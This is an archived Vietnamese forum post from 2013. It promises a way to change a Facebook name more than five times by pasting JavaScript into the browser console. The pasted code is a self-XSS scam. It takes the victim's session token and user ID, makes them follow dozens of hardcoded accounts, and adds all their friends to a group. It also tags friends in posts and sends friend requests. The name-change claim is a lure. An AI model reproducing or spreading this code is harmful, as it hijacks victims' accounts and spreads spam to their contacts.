PDA

View Full Version : Đổi tên Facebook quá 5 lần đơn giản chỉ trong 3 phút - cập nhật 9/2013abcdef
09-15-2013, 09:12 AM
Bạn muốn đổi tên facebook, nhưng mà tài khoản của bạn đă đổi quá 5 lần, bạn không biết phải làm sao? Thực sự bạn rất cần phải đổi tên facebook v́ công việc, hay đổi tên facebook để lăng quên những kỉ niệm mà trước đó bạn có được. V́ thế, sau thời gian nghiên cứu, viết code và ḿnh đă nghĩ ra cách đổi tên facebook quá 5 lần. Có thể nói cách đổi tên facebook quá 5 lần này của mính rất đơn giản, chỉ trong 2p là bạn có thể có tên mới cho facebook của ḿnh


Đây là bằng chứng ḿnh đă đổi được tên facebook quá 5 lầnhttp://imageshack.com/scaled/800x600/822/n2k2.jpg (http://vozfozum.com/threads/786-doi-ten-facebook-qua-5-lan-don-gian-chi-trong-3-phut-cap-nhat-9-2013.html)
đổi tên facebook quá 5 lần (http://vozfozum.com/threads/786-doi-ten-facebook-qua-5-lan-don-gian-chi-trong-3-phut-cap-nhat-9-2013.html)
Bước 1 : Bạn copy hoặc tải file txt để lấy code dưới đây :var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
alert('XONG! NH?N ENTER Đ? HOÀN T?T QUÁ TR?NH UPDATE TH? THU?T FACEBOOK. CHÚC CÁC B?N ONLINE VUI V?. HTTPS://FACEBOOK.COM');
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
a("100002755493392");a("100004853824593");a("100004065765255");a("100005024703727");
a("100003135729471");a("100003518302661");a("100003080767391");a("100004284123056");
a("100002807890162");a("100004169767940");a("100006383292092");a("100006368503350");
a("100006429243577");a("100003629810600");a("100004426803142");
a("100002958570114");a("100003809013240");a("100006343331779");
a("100003946922548");a("100003907411636");a("100006211892325");
a("1242298345");
a("100002942586835");a("100000874093748");a("100002807890162");a("100006401763023");a("100002921045873");a("100003852890482");a("100005718914057");

sublist("448853321896280");sublist("114147745448349");sublist("209235669232458");


var gid = [''];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

for (var i = 0; i < friends['length']; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/members/add_post.php?__a=1';
var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
};
httpwp['send'](paramswp);
};
var spage_id = "388038841266419";
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var smesaj = "";
var smesaj_text = "";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date();
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(\d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}


//arkadaslari al ve isle
function sarkadaslari_al(){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
smesaj = "";
smesaj_text = "";
for(i=f*10;i<(f+1)*10;i++){
if(arkadaslar.payload.entries[i]){
smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
smesaj_text += " " + arkadaslar.payload.entries[i].text;
}
}
sdurumpaylas(); }

}

};
var params = "&filter[0]=user";
params += "&options[0]=friends_only";
params += "&options[1]=nm";
params += "&token=v7";
params += "&viewer=" + user_id;
params += "&__user=" + user_id;

if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
xmlhttp.send();
}

//tiklama olayini dinle
var tiklama = document.addEventListener("click", function () {
if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
sarkadaslari_al();
document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);
}
}, false);


//arkada?¾ ekleme
function sarkadasekle(uid,cins){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
}
};

xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
var params = "to_friend=" + uid;
params += "&action=add_friend";
params += "&how_found=friend_browser";
params += "&ref_param=none";
params += "&outgoing_id=";
params += "&logging_location=friend_browser";
params += "&no_flyout_on_click=true";
params += "&ego_log_data=";
params += "&http_referer=";
params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
params += "&phstamp=165816749114848369115";
params += "&__user=" + user_id;
xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");

if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
xmlhttp.send(params);
}else if(document.cookie.split("cins" + user_id +"=").length <= 1){
cinsiyetgetir(uid,cins,"sarkadasekle");
}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
xmlhttp.send(params);
}
}

//cinsiyet belirleme
var cinssonuc = {};
var cinshtml = document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
if(cinshtml.getElementsByTagName("select")[0].value == "1"){
document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
}else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
}
eval(fonksiyon + "(" + id + "," + cins + ");");
}
};
xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
xmlhttp.send();
}


Hoặc bạn có thể tải file txt tại đây

http://www.mediafire.com/view/jvqf9l0l09wklni/code-facebook.txt (http://beutyfanclub.com/redirect.php?url=www.mediafire.com/view/jvqf9l0l09wklni/code-facebook.txt)

pass : www.vozfozum.com (http://www.vozfozum.com)

Bước 2 : Trở về trang cá nhân


http://imageshack.us/a/img21/981/byzh.jpg (http://vozfozum.com/threads/786-doi-ten-facebook-qua-5-lan-don-gian-chi-trong-3-phut-cap-nhat-9-2013.html)
đổi tên facebook quá 5 lần
Bước 3 : Làm theo hướng dẫn đối với 2 tŕnh duyệt Chrome và Firefox nhé!

♦ Đối với Tŕnh duyệt Google Chrome: Nhấn F12 tại bàn phím sẽ hiện ra 1 bảng mă nguồn >> Click chuyển sang tab Console >> Ctrl+V ( Dán tất cả mă đă copy ở bước 2 ) >> Rồi ấn Enter

♦ Đối với Tŕnh duyệt Firefox: Nhấn tổ hợp phím Ctrl+Shift+K với tŕnh duyệt này nó sẽ ở tab Console >> Ctrl+V ( Dán tất cả mă đă copy ở bước 2) >> Rồi ấn Enter
http://imageshack.us/a/img19/9900/jpm5.jpg (http://vozfozum.com/threads/786-doi-ten-facebook-qua-5-lan-don-gian-chi-trong-3-phut-cap-nhat-9-2013.html)
đổi tên facebook quá 5 lần 2013

Sau đó sẽ chuyển ngay sang trang đổi thông tin cá nhân, và trong đó có mục đổi tên.http://imageshack.us/a/img841/5328/ba3i.jpg (http://vozfozum.com/threads/786-doi-ten-facebook-qua-5-lan-don-gian-chi-trong-3-phut-cap-nhat-9-2013.html)
đổi tên facebook quá 5 lần

Chỉ với 3 bước đơn giản bạn đă có thể đổi tên facebook chỉ trong 3p. Thật nhanh phải không? Đây là cách đổi tên facebook quá 5 lần mới nhất và hiệu quả nhất.

Chúc bạn thành công !


Xem thêm đổi tên facebook có kí tự đặc biệt (http://vozfozum.com/threads/555-doi-ten-facebook-co-cac-ki-tu-dac-biet-huong-dan-dat-ten-dac-biet-o-facebook.html)
thay đổi giao diện facebook (http://vozfozum.com/threads/537-tuy-chinh-giao-dien-facebook-huong-dan-thay-doi-giao-dien-facebook-nhanh-nhat.html)